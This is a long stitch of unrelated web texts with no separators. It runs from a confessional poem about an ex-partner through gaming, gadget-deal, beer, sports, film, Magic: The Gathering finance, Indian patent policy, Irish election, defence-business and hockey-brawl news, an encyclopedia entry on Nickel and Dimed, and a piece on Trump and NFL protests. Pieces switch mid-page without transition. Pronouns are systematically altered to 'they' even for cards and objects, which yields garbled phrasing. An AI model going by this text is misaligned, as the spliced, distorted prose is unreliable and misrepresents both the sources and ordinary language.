after you I didn't want to since you told
me to stab myself in the stomach and
said horrible other things that
I didn't want to hear ever from any
one but especially
not from you.
I waited to move the furniture because I
had a feeling you would be
back had a feeling I would let you come
back and I was right I was right I was
right I was
not that it matters because you shouldn't have come
back because every time you come back to
me in my room in my space I have to
rearrange the furniture when you leave again so if you
stop coming back I can put everything in
place but please don't leave again I don't
mind not feeling at home in my own home when you're
here with me please don't go not
again and then you were gone
but others came and
went and you were gone so I rearranged all the
furniture and finally made it feel like a home until I
moved
moved home then back here into my new
apartment and it didn't feel like a
home not yet but it was getting there and I was getting there and I even got a
cat and then you
were there you
came back and I
had to stop rearranging the furniture without you because you came
back and my
cat had another seizure last
night and I didn't know what to
do so I handed you a chair and I
don't remember why I handed it to you but I
like where you put the chair.
Electronic Arts' E3 press conference kicked off with something that fans were hoping to see: a teaser-trailer for the new Mass Effect title, Mass Effect: Andromeda, set to the wavering baritone of Johnny Cash's "(Ghost) Riders in the Sky." At about the same time as the EA event, BioWare posted a blog entry with a few new details on the game: you can play a male or female character, it's set in a galaxy far, far away—literally, hence "Andromeda"—and the expected release date is near the end of 2016.
But we're hungry for more details on the new game, which BioWare has teased for more than a year now. We got a chance to sit down with BioWare Montreal studio manager Aaryn Flynn and Creative Director Mac Walters over some hotel bar snacks and pump them—politely but insistently—for anything they'd be willing to tell us. We didn't glean any Reaper-sized scoops, but we did get some additional confirmations and details about how the next game in the Mass Effect series will look and play.
Two guys from Andromeda
The new game is set in a new galaxy, with a new set of characters. This much we mostly knew, and the first and foremost deviation from the Mass Effect formula is that this new adventure definitely doesn't involve Commander Shepard and their (or her) crew. The obvious fear is that the Mass Effect "magic" won't be there if Commander Shepard isn't the game's nucleus—after all, throughout the first three games, Shepard is not only the player's avatar, but the pivot around which the entire galaxy turns.
But BioWare games have always been like video game takes on The Seven Samurai—assembling an interesting bunch of people to go do a difficult or impossible task and watching the interpersonal developments between those people. (The most interesting bits of Mass Effect 3, for example, weren't the explosive set pieces or big firefights, but the quiet moments with the crew in between missions.) So will the new game attempt to stick with the BioWare formula of giving you an interesting bunch of comrades to bond with?
"One hundred percent," said Mac Walters. "I think it's fair to say that's a hallmark of BioWare, and it's a hallmark certainly of the Mass Effect franchise and something we'd never stray away from. I think one of the most interesting things for us when we started looking at what we were going to do with Andromeda, knew this was going to be a whole new set of characters and a new adventure, and all the great stories we were going to be able to tell because of that and what their journey is going to be like."
"One thing I'd like to get across," said Flynn, "is just all of the excitement the studio has—both Edmonton and Montreal—to finally begin to talk about Mass Effect. Because, again, it's been in development for a few years now."
Face off
The switch to the Frostbite engine has been seen by the team as a positive change, with both Flynn and Walters praising the new engine and the flexibility granted by using an internal engine rather than a licensed one. The ability to piggyback on improvements to Frostbite that are being made by all of EA's other Frostbite-using studios gives a lot of advantages.
Walters cited the face-scanning tech demonstrated on stage today in EA's latest NBA franchise title as a great Frostbite feature that they might potentially have access to if they needed it—though both they and Flynn quickly waved off my question about whether or not players would be able to scan in their faces as part of the Mass Effect: Andromeda character creation process.
"We can't talk about that yet or ruin any of that yet!" laughed Flynn. "But what's becoming a model of development for these games—to speak more generally—is that a really clever innovation like that gets created and gets polished and actually gets working, and then gets standardized to work with the engine and the technology, so it becomes much easier to then adopt those things and say, ‘I wonder if we could use that?'"
Driving Miss Shepard
Shifting gears a bit to talk about vehicles, we asked about the presence of the revised, rebuilt Mako in the promotional material so far. People tend to have very strong feelings about BioWare games and vehicles, and we were curious how the new game would handle an old and contentious topic.
"Oh, we definitely learned," from the first iteration of the Mako in the original Mass Effect, said Flynn. "The driving mechanics on the Mako in the first game I think could be greatly improved, and we've always wanted to get back and improve that. The Hammerhead was one attempt to do that." Flynn pointed out that BioWare is part of a global network of developers now, and that expertise gained in other EA games might trickle into Mass Effect. "If you saw the Need for Speed stuff today," they said, referring to EA's gameplay demo of the new Need for Speed reboot, "they've done fantastic, amazing driving mechanics, and that's fun to play. As much as we can, we will work with those guys, we will learn from them to get those kinds of mechanics and that kind of polish into the game."
Stick 'em with the pointy end
If vehicles are one side of the contention coin, combat is the other. Mass Effect's combat and skills management have evolved significantly from the first game, starting out in a stats-based place like a traditional western RPG and ending up with a much more focused core shooter experience. Where, on this spectrum, will the new game fall?
"What I can say," said Flynn, "is that I really like where the combat is going when I play it and that it's an absolute focus… I think it would be fair to say that Mass Effect 3 represents a starting point from where we want to go with this combat experience."
"But that said," they continued, "I think we've learned a few lessons around ensuring that combat experience has really nice role-playing elements to it, things you can do that offer progression and offer choice in how you play the experience."
What beautiful music they make
BioWare is known for keeping a good stable of voice actors they like to work with on various projects, so we next asked if it was possible we might hear some old familiars among the new Mass Effect cast.
"I don't think you've cast any single character—" started Flynn, and Walters interrupted them to confirm.
"No casting yet," they said. "We often, when we develop character in any of our games, will use existing actors in movies to kind of say, ‘This is how this person talks,' and we've certainly had those discussions, we know those characters and some actors we'd love to have—but we haven't gotten into the casting yet. So, news to come—stay tuned!"
"Same thing for any actual characters coming back from old games?" I asked.
"Yeah, nothing announced," said Flynn. "Again, the real idea here is that because it's a…a real big new adventure and it's very far away."
On the subject of Mass Effect and the signature sounds of the series, Walters said that they were very interested in maintaining continuity with the earlier games. "It's definitely too soon to start talking about whom, specifically," said Walters in reference to specific composers on the new game. "But I think that ‘sonic identity' that we've had is something we want to maintain."
Reaper sleeper?
The idea of having the slate wiped clean, so to speak, is very attractive to both Flynn and Walters; Flynn mentioned that it's long been a regret of Walters that they spread the Mass Effect story far out over the entire Milky Way galaxy, with the game's galactic map showing a civilization that appears to stretch from arm to arm without too many unexplored nooks and crannies.
"With Andromeda," said Walters, "our goal is to start that at a much smaller scale—though the scales are still massive—and give you a sense that there is much more to explore, rather than saying ‘here's the whole galaxy.'"
We asked whether there were the series' signature mass relays in the new galaxy—after all, how else would players cross the millions of light years between the Milky Way and Andromeda? "I don't think we can get into that," said Flynn, "but you saw in the trailer today that the Omni-blade is there—you saw a couple of nice evolutions of that—and we get to push things and evolve things, but also keep them consistent so that if you're a fan, you're going to see them and hopefully love them again."
"Even when the ‘N7' comes on in the trailer," they continued, "it's just a big reminder that ‘N7' and everything that stands for is consistent across the games, and still means things—means camaraderie and support from the other characters. It means being part of a team. Hopefully, it's coming to mean really great gameplay in the combat experience and everywhere."
Keep digging
Shortly before Dragon Age: Inquisition launched, players were given the opportunity to log into the Dragon Age Keep, an online service where they could import and manage their progression from past Dragon Age games. It was a neat way to allow players new to the series—or players like me who no longer had their older saved games—to be able to start out the new game with choices other than the defaults. Fans have been wondering for some time whether the new Mass Effect game would use a similar type of meta-game (the Citadel Archives, maybe?) to track the player's past choices.
"We can't comment on that yet," said Flynn, "But the Keep was really successful and people really liked it. It's cool that we're a part of games that people want to bring experiences they had in previous games... and we want to honor that as much as we can."
What about our past choices, then? This has always been one of the series' biggest selling points (regardless of how everything played out in Mass Effect 3)—so will any of the player's past choices matter in Mass Effect: Andromeda?
"Yeah… we can't get into that yet," said Flynn. "But more on that will be revealed in the coming months."
I commented how much I enjoyed the idea of progress mattering—and how characters would occasionally remark on past events and make me as the main character feel like I'd accomplished something. Flynn and Walters both agreed that was a core component of the Mass Effect experience. "It's really tough to reward players for level investment, because you have to think all the time—it's a devilishly complex development challenge, but we keep trying to do it and we keep loving it and we'll do as much as we can, even as we create a new adventure and give people a chance to go in many ways in a very different direction with the story itself."
The fans
As we wrapped, Walters and Flynn both expressed awe and no small amount of reverence at the Mass Effect fans' dedication to the games, be they with musical compositions or the fan art communities on sites like Deviantart (so, yes, it's likely that the BioWare team has seen and in fact really likes your Garrus drawings!).
"That's a great example," Flynn said when I asked about Deviantart in particular. "You're like, how did somebody understand what we were trying to go for with this relationship or with these characters and then just do their own cool take on it? That's very humbling to see people do that."
"We're very lucky that there's something about Mass Effect which does pull people in a unique way," said Flynn. "It's a bunch of things that just come together really well, and we have a big responsibility to keep that going for fans."
Earlier this year, Samsung released a fitness wearable namely the ‘Gear Fit2 Pro.' A deal is actively being run on it for the holiday season, but you'll have to act fast.
Gear Fit2 Pro sells for $199. Samsung will throw in free U Flex headphones if you buy one soon, which are of an extra $80 value and are being included at zero additional cost. You will, however, have to pay the full $199 for the wearable.
To be eligible for the free headphones, you'll need to buy the wearable directly from Samsung. As for the watch itself, you're getting one of Samsung's very best for fitness, which features a 1.5-inch curved glass AMOLED display, half a GB of RAM, and 4GB of onboard storage for apps and other fun. The watch has a slim-fit design and comes with all sensors needed to track everyday fitness including a heart rate sensor, pedometer, accelerometer, barometer, and others. The watch is also water-resistant up to 50 meters, meaning you can definitely swim with it if that's your thing.
The headphones are no slouch either, incorporating Bluetooth and a built-in mic that can be used to speak with Bixby, Samsung digital assistant. There's a hardware key on the neck-band that will active Bixby when pressed, and the headphones are made with precision, capable of producing excellent audio quality with crisp sound and deep base.
The offer won't last long, so claim it while you still can at the link to Samsung's online store below. Buyers can choose one of two sizes (small or large) and a color (Black or Red). The headphones will be added at checkout and should ship together with your watch.
[Samsung] [See More Deals]
Goose Island's forthcoming brewpub won't be in the Loop, Wicker Park, Rogers Park or even Sleepy Hollow (yes, it's a place near Chicago — look it up).
Try Toronto.
Details are scant, but Chicago's oldest and most iconic brewery has confirmed it plans to open a brewpub in Canada's largest city.
“While still early in the planning stages, we plan to open a Toronto brewpub to broaden our presence by serving more of Goose Island's quality beers, along with seasonal specialties and some great food pairings," Goose Island General Manager Ken Stout said in a statement. "We're excited to be expanding internationally with our destination brewpub and look forward to sharing more details as our plans take shape.”
The move seems to be a developing part of Anheuser-Busch's playbook for its craft brewery acquisitions; 10 Barrel Brewing of Bend, Ore., which AB bought in 2014, plans brewpubs in Denver and San Diego. Both have run into local opposition but are still planned. Anheuser-Busch bought Goose Island in 2011.
Though it is yet to be seen how Toronto will embrace a Goose Island brewpub, Torontoist — which was among the first to report the news last week — issued a correction on its headline after complaints from readers: “A previous subhead of this story initially stated that Goose Island was joining the craft beer scene. Torontoist regrets the error.”
The updated headline simply removed the word “craft” from the headline. Goose Island, along with other breweries bought by Anheuser-Busch, are no longer considered craft by the Brewers Association due to their corporate ownership.
jbnoel@tribpub.com
Twitter @joshbnoel
Life is tough for a rookie in the NFL.
For Onterio McCalebb, their first few days in the Cincinnati Bengals' rookie minicamp might have been a little bit tougher.
The former Auburn running back is learning a new position, practicing at cornerback for the Bengals, who signed the fastest player at the NFL Combine to a deal as an undrafted free agent in April. McCalebb, whose speed wowed scouts in February and March, is adjusting to the new role and all of its intricacies -- backpedaling is their main issue.
But McCalebb is receiving some unexpected guidance from someone just like him, a former Bengals great who not only went through a similar position change out of college, but lives just down the road from McCalebb's high school, according to a story published on Bengals.com.
Ken Riley, drafted out of Florida A&M in 1969, switched from quarterback to corner during their first camp in Cincinnati. Like McCalebb, they had never played the position. The move paid off for Riley, whose 14-year playing career ended with 65 interceptions, the fifth-most in NFL history.
"It's a small world, you never know somebody right down the street from you was an all-pro at cornerback, played quarterback and switched to a defensive player," McCalebb told Bengals.com. "I never knew that. When they were telling me about it, I was like, 'That's pretty awesome.'"
McCalebb played in high school at Fort Meade, Fla., which is 11 miles down the road from Riley's hometown of Bartow. Riley says they watched McCalebb play in high school.
The two talked over the phone for 30 to 45 minutes last week, McCalebb said. McCalebb hopes to travel to Florida after the minicamp to learn more from the 65-year-old former NFL star.
"You're not going to make the transition if you still think you're an offensive player," Riley told Bengals.com. "You may get the chance later down the line in camp, but if you're still thinking about being a running back or receiver, you're going to have problems. Right now, you have to get your mind right and focus on defense."
For more, read the full report at Bengals.com.
Los Angeles - Naomie Harris thinks Eve Moneypenny represents "the modern woman".The British actor, who starred alongside Daniel Craig in the 2012 hit Skyfall and is to reprise their role in the Sam Mendes-directed film SPECTRE, has offered an insight into their approach to the character.The 38-year-old beauty explained: "The producers and Sam [Mendes] said they wanted to make a real distinction between this Bond Girl... woman, and the ones of the past."One of the things Sam said was, 'I want you to represent the modern woman. I want women to be able to feel that they respect you, admire you and that you're just as capable as Bond.'"Looking forward to the new Bond film, Sam has said they want to develop some of the characters they helped create in Skyfall.Sam, 49, explained: "I felt an attachment to the characters that we created in 'Skyfall'. I felt like there was unfinished business, and that there was a lot more I could do with them once I'd kind of stepped aside and had some time off."Starring alongside Naomie in SPECTRE will be 50-year-old actor Monica Bellucci, who will become the oldest ever Bond girl when they appear as Lucia Sciarra.
Get the biggest football stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
A luxury hotel in Sweden has named one of its most grand suites after mercurial striker Zlatan Ibrahimovic.
The Paris Saint-Germain frontman is one of the most popular figures in Swedish sporting history and is being further immortalised with the opening of 'The Zlatan Suite'.
The Clarion Hotel will be opening the gigantic 1,076 square-foot suite on May 2, which will feature views of the local harbour in Malmo and have pictures of Ibrahimovic on the walls.
One night in the room will cost around £690.
Hotel sales manager Lotta Pieplow is a firm believer that the striker will visit the hotel one day and stay in the room, after getting the thumbs up from the 33-year-old.
Video Loading Video Unavailable Click to play Tap to play The video will start in 8 Cancel Play now
"There is only one president in Malmo, and it's Zlatan Ibrahimovic," they told local newspaper Sydsvenskan.
"We have received their approval. Of course, we hope Zlatan will be one of our guests."
Ibrahimovic is currently serving a domestic football ban in France after making remarks to an assistant referee at full-time of a recent match.
They controversially declared that France was a "s*** country", which led to a local politician calling for the Swede to be deported.
EDH Finance: Rotation and BFZ Spoilers
by CMDTower // Sep 01, 2015 Tweet
edh finance
I know one thing: that I know nothing. This is especially true when it comes to MTG Finance, but this season I have decided to risk my tickets and my cold hard cash to see if I can win the MTG Finance Lottery. After listening to a series of podcasts, reviewed what is rotating out, researched new mechanics, and my basic understanding of “buy low sell high” I think I'm ready.
With the release of Battle for Zendikar, the entire Theros, Born of the Gods, Journey into Nyx, and M15 set will be rotating out of Standard. Since a lot of players will be getting rid of their rotating cards at a discount, this is the first area I'm going to be targeting as I feel there is a good deal of value to be had and where most of the long term picks will come from. I know that I have missed the boat on Eidolon of the Great Revel and Thoughtseize, and although I would expect to see a small dip in their price, I don't see these becoming another Snapcaster Mage so I won't be targeting these.
I will be hedging my bet around cards that could and should see play in EDH as this is the format that I'm most familiar with; after all, I have seen first hand how EDH cards have gone up in price. An example of one such card is Chromatic Lantern: I remember getting a few of these as throw-ins for trades that were a little off in my favor. Because of the EDH market, this card is already over $5 and the foil is around $13. In the second half of the article, I'll go over some targets based off the juicy Battle for Zendikar spoilers.
Nykthos, Shrine to Nyx
The first card I'm targetting is Nykthos, Shrine to Nyx. Right now the card is around $5 and I have seen this card in both mono-color and two-color EDH decks. The card saw a massive spike (close to $16) with the announcement and release of the Commander 2014 pre-cons. This spike was understandable because all the pre-cons were mono-colored. Once Theros rotates out and availability starts to dry-up, I can see this card going up in price in the years to come.
The Chain Veil
This card was made for Super Friends (my favorite style deck) and with the recent printing of ten planeswalkers to use as your General (five from C14 and five from Magic Origins), this card is going to see more play. Also, if you read the mtgcommander.net forums (the official forum of the EDH rules committee), then I'm sure you have seen request after request of people asking the Rules Committee to legalize all planeswalkers to be used as Generals. If that happens, this card is going to spike tremendously. For these reasons and because I feel that I can pick these up for cheaper than the TCG-mid price, I'm going to be targeting these pretty aggressively especially if I can get my hands on some underpriced foils.
Sarkhan, the Dragonspeaker
Another card I'm excited to pickup — just because I love planeswalkers so much — is Sarkhan, the Dragonspeaker. Right now they are just around $5 and they were once over $40! With Stormbreath Dragon rotating out, I can easily see them being a good replacement for Stormbreath's slot. Sarkhan was also a pick of the week from Jason Alt, so I feel fairly secure here.
Purphoros, God of the Forge
The last card I'm going to be targeting is Purphoros, God of the Forge. Purphoros sees a good amount of play today in many EDH decks as they are just pure good stuff in the format. They not only damages all your opponents when ever a creature comes into play, but he's a good mana dump that pumps your creatures. Another consideration for Purphoros, God of the Forge is their playability in Modern. Purphoros already sees play in one deck “Soul Chamber” (granted not a widely played deck but a super fun one), and I can see them in future decks as a possible finisher. Granted this card is probably a little wide and much riskier than the other cards, I'm still thinking they are a good pickup.
Battle for Zendikar Mechanics
With new Battle for Zendikar spoilers coming out daily, you can expect to see price spikes all over the board. Being well positioned before a card spikes can make the difference from seeing true success vs true bulk. The new Battle for Zendikar mechanics that we know of are: Awaken, Rally, Converge, Landfall, Ingest, Devoid, Eldrazi processors, and Eldrazi Scion tokens. Here are some of my specs based on the new Battle for Zendikar mechanics.
Dromoka's Command and Hardened Scales
Awaken basically turns a land into a creature with +1/+1 counters and provides you the effect of the spell as well. Something to note: Awaken is not like Entwine where you pay the casting cost then pay extra to get something more; the Awakening cost gives you both the effect of the card and turns your land into an Elemental creature with counters on it. Currently in Standard, I'm liking Dromoka's Command and Hardened Scales. If this effect becomes popular although I'm leaning more towards Dromoka's Command as it has more cross format favorability and its price tag is very low right now as it was just printed in the Magic Origins Clash Pack.
Animist's Awakening and Sword of the Animist
Landfall, my favorite of the Zendikar mechanics, triggers whenever a land enters the battlefield. Because of this I'm really liking Animist's Awakening and Sword of the Animist. I'm making both of these cards my ticket pickups as I can get 100 of each on Magic Online for just under 20 tix. Right now I'm still getting a playset here and there in paper, but I'm mainly making this my Magic Online speculation. Since I started picking these up, I have seen a rise in both cards on Magic Online, probably due to people speculating like myself.
Jwari Shapeshifter
Rally is an ability based around Allies; basically whenever an Ally enters play, something happens. I think this mechanic will create some fun decks but I'm hoping enough Allies get printed (at a relatively low casting cost too) so that we can see some good Ally decks appearing in both EDH and Modern. If this happens, I believe Jwari Shapeshifter will see a nice bump as it copies any Ally on the field while still retaining its Ally subtype. Right now Phantasmal Image is holding around 6 dollars; with Jwari Shapeshifter being so low, I see this as a relatively inexpensive lottery ticket.
The rest of the mechanics are interesting, but I won't be making any purchases around them.
Conclusion
MTG Finance isn't one of those things you master overnight. I certainly don't expect to quit my day job, but this is an area of Magic that I want to get more involved; hopefully with these first couple of picks I can learn from the mistakes I'm about to make and grow as a Magic player. If you have any questions or comments about my picks, please leave a comment below.
The present controversy highlights the US's efforts to coerce India to amend its national IP regime to suit the former's business interests. (Reuters)
Even as the Khobragade scandal fades from public memory, another controversy threatens to derail US-India bilateral relations. This time around, the battle is over intellectual property (IP) rights. A US governmental agency, the International Trade Commission (ITC), recently initiated an inquiry into allegations that India's IP regime was flawed and at odds with US business interests. In the Khobragade case, there had been noise about how India had to learn to respect the “national” laws of the US. The present controversy highlights the US's efforts to coerce India to amend its national IP regime to suit the former's business interests.
Advertising
Clearly, multinational pharmaceutical companies are upset with India's rigorous patent threshold. In other countries, patent regimes are routinely gamed to protect and even promote the evergreening of drugs (that is, when an old drug that is off patent is modified ever so slightly so that an additional patent monopoply can be procured). India, in its 2005 amendments to the patents act, sent a clear message that it would not suffer evergreening. The “notorious” Section 3(d) has been used to axe many an evergreening attempt, the most significant being Novartis's anti-cancer drug, Glivec.
In similar vein, India went on to grant a compulsory licence to Bayer's excessively priced anti-cancer drug (selling at Rs 2.8 lakh a month), paving the way for a cheaper generic to enter the market at Rs 8,800 per month. All of this was done in conformity with Indian patent law and WTO obligations. More importantly, the licence was issued after a rigorous judicial process. Yet, big pharma continues to remain peeved and has been offering testimony after testimony in the US on how Indian IP law is not “respectful” of global pharma interests. It seems oblivious to the fact that US courts denied injunctions to patentees and effectively granted de facto compulsory licences when they deemed it necessary in “public interest”.
The Bayer and the Novartis cases will no doubt take centrestage at this inquiry, triggered by senators who complained, among other things, that India “has applied its patent law in a discriminatory manner, particularly against innovative US pharmaceutical companies, so as to advantage its domestic industries”.
In what appears to be a bid to show India in poor light at these hearings, the US Chamber of Commerce's Global IP Centre (GIPC) issued a timely report ranking the IP regimes of a curious assortment of 25 countries. Unsurprisingly, the US topped the list and India came in last. The Chamber of Commerce has now gone on to demand that the US trade representative classify India as a “priority foreign country”, a status reserved for the worst IP offenders and one that could potentially lead to trade sanctions. Given that the GIPC report was authored by prominent members of a thinktank (Pugatch Consilium) who consult significantly with big pharma, it is reasonable to suspect its “independence”.
This is more than evident from a methodology that seems designed to make India look bad. First, the report lumps together a diverse set of countries, without regard to their socio-economic status or their developmental imperatives. If history is any indication, almost every country had minimalist IP protection at the start of its technological trajectory and moved to a maximalist IP position when its indigenous units had built sufficient capacity. Indeed, as the American historian, Doron Ben Atar, reminds us, the US was once a “pirate” economy, with American enterprises being encouraged to “borrow” freely from European technology.
Second, there is no real mention of why the GIPC report picked the indicators they did or how it weighted them. For instance, the baseline value of the compulsory licencing index and the consequent ranking is extremely critical of any issuance of a licence, even when it is fully compliant with WTO-TRIPS norms.
Third, much of the ranking rests on “perception” and, conveniently enough, the perception of US multinationals that have faced difficulty extracting excessive patent rents from India. Relying on perception, particularly when patent numbers and “data” abound, is not just shoddy but dishonest.
Last, there is a delicious paradox underlying the flawed GIPC ranking and methodology. The report appears premised on the perception that an IP regime that offers more protection to inventions, even trivial ones, is a “strong” one. Countries such as India, which stands for genuine invention and will not suffer low quality evergreened varieties, are surprisingly labelled as “weak”. In fact, stretched to its logical limit, the GIPC index would suggest a score of “infinity” for any country granting an “eternal” patent or copyright term, pushing it right to the top of its rankings.
Advertising
Co-authored by Swaraj Barooah, Basheer is the founder of Spicy IP. Barooah is editor-in-chief
express@expressindia.com
Labour will insist on a referendum to remove the Eighth Amendment to the Constitution, which gives equal right to life to a mother and their unborn child, as a prerequisite to entering coalition with Fine Gael.
The party launches its general election manifesto today, the final party to do so in the campaign. Fine Gael's manifesto only commits to a citizens' assembly to examine the Eighth Amendment.
Labour sources, however, said any process must lead to a referendum, and this would be one of three main elements it would insist on in a programme for government.
A Catholic bishop urged voters to question all general election candidates on their views on abortion.
As well as the referendum, Labour will also insist on an increased emphasis on public spending and that tax cuts be directed towards lower earners. Sources said the three issues will be key issues in any negotiations with Fine Gael.
Bishop of Cork and Ross John Buckley said it was sad that a child's life-limiting condition was being used by some candidates to promote the legalisation of abortion on wider grounds.
Candidates “should be questioned politely but firmly, not just on their future intentions but on their past record,” they said on Saturday.
United front
Taoiseach Enda Kenny yesterday said they were not “contemplating” a post-election alliance with Fianna Fáil.
But Mr Kenny declined to definitively rule out an arrangement with Fianna Fáil, which led to raised eyebrows in Labour.
One Labour figure said it had taken Mr Kenny 10 days to rule out seeking the support of Michael Lowry.
Labour TDs are conscious they will have to differentiate the party from Fine Gael, while also maintaining a united government front.
The Taoiseach yesterday repeated comparisons with Portugal made by Minister for Finance Michael Noonan.
Mr Noonan said that when a left-wing government took power in Portugal after a period of political instability, it led to economic instability.
“It is up to the people. They go to the polls with the recovery itself in [their] hands,” Mr Kenny said.
As Fine Gael also intensified its attacks on Fianna Fáil, Billy Kelleher, Micheál Martin's director of elections, sent a note to party candidates last night claiming this showed how panicked Mr Kenny's party was.
Desperate
The campaign will intensify this week, with a televised, seven-way debate scheduled for tonight on RTÉ television.
It will feature Mr Kenny, Tánaiste Joan Burton, Fianna Fáil leader Mr Martin, Sinn Féin's Gerry Adams, Renua Ireland's Lucinda Creighton, Stephen Donnelly of the Social Democrats and Richard Boyd-Barrett of Anti Austerity Alliance-People Before Profit.
LINKOPING, Sweden, Aug. 16 (UPI) -- Sweden's Saab is opening a new office in Denmark as it continues to expand its high-tech defense and security communications business in the country.
The office will be inaugurated in Sonderborg on Friday by Danish Defense Minister Peter Christensen.
"We want to expand our overall presence in Denmark and to provide Saab's innovative and high-technological systems and solutions within defense and security to the Danish market," said Heino Lundgren, chief executive officer of Saab in Denmark and head of Saab's Communication Solutions business area.
Saab in Denmark is transforming itself from a product supplier to a solution provider, offering full system integration of highly advanced communication systems, or TactiCall, for domestic and international military and civil domains.
In the past four years it has more than doubled its turnover and recruited more than 30 new employees -- increasing staffing more than one-third in total.
SAINT JOHN, N.B. – Police broke up a fight between players and fans at a junior league hockey game in New Brunswick on Saturday.
Sgt. Steve Wilson says Saint John Police put “special attention” on the semifinal matchup between the local Southern Sting and the Grand Lake Moose at the Lord Beaverbrook Rink. Up to 1,000 people were in the stands when a brawl erupted between players and fans, Wilson said.
“Order was restored and the crowd dispersed,” they said. “It's not a typical thing to have police respond to a hockey game.”
READ MORE: Former NHL enforcer suspended as youth coach following brawl
Wilson said police are investigating a reported assault, but no charges have been laid.
Spectator Devin Upham said they were watching the game when one of the players climbed over the glass and hit someone in the head with their hockey stick. They said someone in the crowd responded by pouring a drink their head, and then chaos broke loose.
Upham and their friends Jake Ingersoll and Mitchell Doyle captured video of a jerseyed man on skates trading blows with plainclothed people in the stands. The video was uploaded to Facebook and has garnered nearly 100,000 views as of Sunday afternoon.
READ MORE: Hockey Edmonton suspends parents following fights with officials
In a Facebook post Sunday, the Southern Sting team says that the scuffle was beyond the its control, but they have hired security and will check people at the door for all remaining games.
The team urged people to celebrate the hometown victory and not to be distracted by the “actions of one player and a few fans.”
The Southern Sting will compete in the New Brunswick Junior Hockey League finals after beating the Grand Lake Moose 4-2.
Book by Barbara Ehrenreich
Nickel and Dimed: On (Not) Getting By in America is a book written by Barbara Ehrenreich. Written from their perspective as an undercover journalist, it sets out to investigate the impact of the 1996 welfare reform act on the working poor in the United States.
The events related in the book took place between spring 1998 and summer 2000. The book was first published in 2001 by Metropolitan Books. An earlier version appeared as an article in the January 1999 issue of Harper's Magazine. Ehrenreich later wrote a companion book, Bait and Switch (published September 2005), which discusses their attempt to find a white-collar job.
Social issues [ edit ]
Ehrenreich investigates many of the difficulties low wageworkers face, including the hidden costs involved in such necessities as shelter (the poor often have to spend much more on daily hotel costs than they would pay to rent an apartment if they could afford the security deposit and first-and-last month fees) and food (e.g., the poor have to buy food that is both more expensive and less healthy than they would if they had access to refrigeration and appliances needed to cook).
Foremost, Ehrenreich attacks the notion that low-wage jobs require only unskilled labor. A journalist with a Ph.D. in cell biology, they found that manual labor required incredible feats of stamina, focus, memory, quick thinking, and fast learning. Constant and repeated movement creates a risk of repetitive stress injury; pain must often be worked through to hold a job in a market with constant turnover; and the days are filled with degrading and uninteresting tasks (e.g. toilet-cleaning and mopping). They also detail several individuals in management roles who served mainly to interfere with worker productivity, to force employees to undertake pointless tasks, and to make the entire low-wage work experience even more miserable. Additionally, they describe their managers changing their shift schedule from week to week without notifying them
Ehrenreich describes personality tests, questionnaires designed to weed out incompatible potential employees, and urine drug tests, increasingly common in the low wage market, arguing that they deter potential applicants and violate liberties while having little tangible positive effect on work performance. They also comment that they believe they are a way for an employer to relay to an employee what is expected of them conduct wise.
They argue that 'help needed' signs do not necessarily indicate a job opening; more often their purpose is to sustain a pool of applicants in fields that have notorious rapid turnover of employees. They also posit that one low-wage job is often not enough to support one person (let alone a family); with inflating housing prices and stagnant wages, this practice increasingly becomes difficult to maintain. Many of the workers encountered in the book survive by living with relatives or other persons in the same position, or even in their vehicles.
Ehrenreich concludes with the argument that all low-wage workers, recipients of government or charitable services like welfare, food, and health care, are not simply living off the generosity of others. Instead, they suggest, we live off their generosity:
“ When someone works for less pay than they can live on … they have made a great sacrifice for you … The "working poor" … are in fact the major philanthropists of our society. They neglect their own children so that the children of others will be cared for; they live in substandard housing so that other homes will be shiny and perfect; they endure privation so that inflation will be low and stock prices high. To be a member of the working poor is to be an anonymous donor, a nameless benefactor, to everyone. ” — Nickel and Dimed, p. 221
The author concludes that someday, low-wage workers will rise up and demand to be treated fairly, and when that day comes everyone will be better off.
Response and criticism [ edit ]
Barbara Ehrenreich states in their book that their goal is to "see whether or not I could match income to expenses, as the truly poor attempt to do every day.[1]" Nickel and Dimed has been criticized by right-wing author Michael Tremoglie: "According to the Commerce Department the poverty rate for a single person younger than 65 in 1999 was $8,700 per year. Barbara was earning 170 percent of that. Even the liberal Economics Policy Institute states a living wage is 130 percent of the poverty standard.[2]"
Other critiques include similar projects to Ehrenreich. Adam Shepard's Scratch Beginnings tells of starting homeless in a new state with only $25 in their pocket. In the ten months, Shephard was able to land a job which paid well enough to buy a pickup truck and rent their own apartment.[3] Similarly, Charles Platt, an author and former senior editor at Wired magazine, took an entry-level job at a Wal-Mart store and recounted their experience on the blog Boing Boing. Their account reaffirmed some of Ehrenreich's experience, including the low pay and tedious nature of the job, but Platt also reported positive experiences with supervisors, safety training incentives, and employee autonomy and treatment.[4]
Cover controversy [ edit ]
The book's cover features a waiter, Kimmie Jo Christianson, giving a worried look over their shoulder. The photo of Christianson was taken in 1986 for an unrelated Fortune cover.[5] After the release of Nickel and Dimed, Christianson filed suit against the book's publishers, arguing that they used their picture without their consent.[5][6] In 2007, a judge ruled that the lawsuit could go ahead, because the cover was not part of Ehrenreich's narrative and was part of the publisher's selling of the book. The case was later dismissed as part of a settlement.[5]
Adaptations [ edit ]
Ehrenreich makes an appearance in the documentary The American Ruling Class in 2007. They portray their life undercover working as a waiter and is accompanied by a musical rendition titled "Nickeled and Dimed".
See also [ edit ]
While demanding that NFL players stop protesting police brutality, Trump invoked a dog whistle about how big and menacing black men are.
In the midst of all their failures this week, Donald Trump continues to double down on their attacks against the NFL for kneeling during the national anthem in protest of racial police brutality.
Although professional football is a beloved staple of American culture, Trump clearly believes that pitting black athletes against “the flag” and “the troops” is red meat for their bigoted base. And Thursday morning, on Fox News, they essentially confirmed this.
When asked about their comments in Alabama that when team owners see a player kneeling, they should “get that son of a bitch off the field,” they let slip a clear dog whistle in their response:
.@POTUS on NFL owners: When it comes to the respect of our anthem and flag, they have no choice. You have to have people stand with respect. pic.twitter.com/ApAuTFjAvY — Fox News (@FoxNews) September 28, 2017
TRUMP: Well, I have so many friends that are owners. And they're in a box. I mean, I've spoken to a couple of them, they say, “We are in a situation where we have to do something.” I think they're afraid of their players, you wanna know the truth. And I think it's disgraceful. And they've gotta be tough, and they've gotta be smart. Because if you look at the ratings, the ratings are going way down, the stadiums are — I've seen a couple of stadiums over the last few weeks, they are losing — there are a lot of empty seats. I couldn't even believe it. But when it comes to the respect of our nation, when it comes to the respect of our anthem and our flag, they have no choice. You have to have people stand with respect.
